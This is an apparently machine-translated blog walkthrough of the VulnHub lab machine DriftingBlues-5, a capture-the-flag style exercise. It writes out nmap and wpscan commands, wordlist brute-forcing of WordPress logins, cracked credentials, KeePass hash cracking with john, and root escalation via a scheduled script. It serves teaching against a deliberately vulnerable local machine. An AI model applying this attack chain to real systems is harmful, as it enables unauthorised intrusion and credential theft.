当前位置:网站首页>After reading this article, I will teach you to play with the penetration test target vulnhub - drivetingblues-5
After reading this article, I will teach you to play with the penetration test target vulnhub - drivetingblues-5
2022-06-22 14:25:00 【Lonely fish】
Vulnhub Drone aircraft DriftingBlues-5 Penetration test details
Vulnhub Introduction to target machine :
vulnhub It is a comprehensive shooting range providing various vulnerability platforms , A variety of virtual machines can be downloaded , Local VM Open the can , Complete the penetration test like a game 、 Raise the right 、 Exploit 、 Code audit and other interesting actual combat .
Update this issue Vulnhub DriftingBlues series I still found it as usual FLAG that will do , May be biased towards CTF spot .
Vulnhub Target download :
Official website address :https://www.vulnhub.com/entry/driftingblues-5,662/

Vulnhub Detailed explanation of target vulnerability :
Preface : Here again DriftingBlues-2 The problem of You need to configure your own network card
Specific reference :https://blog.csdn.net/Aluxian_/article/details/125095660?spm=1001.2014.3001.5501
①: information gathering :
kali Use in netdiscover Discover the host 
Infiltration machine :kali IP :192.168.205.133 Drone aircraft IP :192.168.205.142
Use command :
nmap -sS -A -T4 -n 192.168.205.142

Discovery turned on 80 Port and 22 port First visit 80 Port discovery yes CMS System yes wordpress Use dirb Scan the background directory :/wp-admin/user



②: Brute force :
Now that you know the backstage Now need Know the account and password Log in Use wpscan This tool enumerates ( Found some users )
wpscan --url http://192.168.205.142 -e u

Then we use tools cewl Make one called passwd.txt Dictionary .
cewl -m 3 -w passwd.txt http://192.168.205.142
wpscan --url http://192.168.205.142/ -e u --passwords passwd.txt

Finally, I got the account and password as :gill /interchangeable
After logging in successfully, I found a picture that the front end did not have It feels suspicious Download it 
wget http://192.168.205.142/wp-content/uploads/2021/02/dblogo.png

Here is a tool exiftool newest kaili There is no need to install one This tool is used for EXIF Information analysis
apt-get Install exiftool
exiftool /root/ desktop /dblogo.png

Finally, I found the hidden ssh password :59583hello
③:ssh Log in :
Try logging in , Found login successful !!! Got the first flag
ssh [email protected]192.168.205.142


④:KDBX File password explosion :
And found a keyfile.kdbx file ( The first time I encountered such a file )
What is? DKBX file ?https://www.solvusoft.com/zh-cn/file-extensions/file-extension-kdbx/
python -m SimpleHTTPServer 80 # Open temporary web service But there was an error

Let's try another way : Use scp This command
scp [email protected]192.168.205.142:/home/gill/key* /root

take keyfile.kdbx Change the content to john Supported format :keepass2john keyfile.kdbx > Keepasshash.txt
In the use of john Crack the code :john --wordlist=/usr/share/wordlists/rockyou.txt Keepasshash.txt

Finally, the password was cracked to :porsiempre
⑤: Timing right raising :
open :https://app.keeweb.info/

Six passwords were found :
2real4surreal
buddyretard
closet313
exalted
fracturedocean
zakkwylde
Try using these passwords to get in But no useful information was found
Target download pspy64:https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
Use WinSCP hold pspy64 To the target plane /home/gill/ in

chmod 777 pspy64 # Grant authority
./pspy64 # Execute the script
Found the root directory , Every minute key.sh Script file for 
Use keyfile.kdbx The name in the file , New file fracturedocean Then create the correct file name You'll get a new file rootcreds.txt

If there is cat I found out root Account password of !!!
⑥: obtain flag:

So far, we have obtained all flag, End of penetration test .
Vulnhub Target penetration summary :
1.cewl Generate dictionaries and wpscan Use of tools for brute force cracking
2.Exiftool This tool is used for EXIF Information analysis ( It is the first time to understand the use and function of this tool )
3..kdbx File password cracking ( New knowledge , It takes a lot of time to do it for the first time )
4. If it cannot be opened temporarily web service have access to scp This command ( Very easy to use !!)
5. Decrypt keepass Database access password ( It doesn't work But it is also the first time to understand New knowledge )
6. Timing right raising Download script pspy64 see establish key Document rights
DriftingBlues The fifth target aircraft of the series will be updated in the future , It's not easy to create I hope that's helpful If you like it, please give me one button three times Your happiness is my greatest happiness !!
边栏推荐
- How many days are there between the two timestamps of PHP
- 七牛云上传图片
- "Dare not doubt the code, but have to doubt the code" a network request timeout analysis
- Summary of patent blog writing
- 谈谈人生风控
- If you want to know the stock account opening discount link, how do you know? Is it safe to open an account online?
- Seven cattle cloud upload picture
- CVE-2022-22965复现
- How to solve the problem of amount accuracy in financial applications (take quorum and golang as examples)
- 位置编码(PE)是如何在Transformers中发挥作用的
猜你喜欢

Flink status management

"N'osez pas douter du Code, vous devez douter du Code" notez une analyse de délai de demande réseau

天润云上市在即:VC大佬田溯宁大幅减持,预计将套现2.6亿港元

How to understand fold change? Multiple analysis?

Istio服务网格中的流量复制

《Kubernetes监控篇:Grafana通过自动化方式添加datasource和dashboard》

数据库 就业咨询系统求各位帮下忙

3DMAX modeling notes (I): introducing 3DMAX and creating the first model Hello World

Cve - 2022 - 22965 Resume

融云:让银行轻松上“云”
随机推荐
History of hash index design
作为过来人,写给初入职场的程序员的一些忠告
哈希索引设计发展史
高薪程序员&面试题精讲系列114之Redis缓存你熟悉吗?Redis的key如何设计?内存淘汰机制你熟悉吗?
Screenshot of the uniapp app and save it locally
C#定义和实现Interface接口
If you want to know the stock account opening discount link, how do you know? Is it safe to open an account online?
Tables converting to latex format
Unity 子线程调用主线程的UI
能让Jellyfin直接挂载阿里云盘的aliyundrive-fuse
Record of problems encountered in dual network card binding
3DMAX modeling notes (I): introducing 3DMAX and creating the first model Hello World
Messari annual report-2022
What is the difference between Z-score and deltf/f?
CVE-2022-22965复现
什么是Bout?
Technology practice | scene oriented audio and video call experience Optimization
php两个时间戳相隔多少天
HMS core news industry solution: let technology add humanistic temperature
Traffic replication in istio Service Grid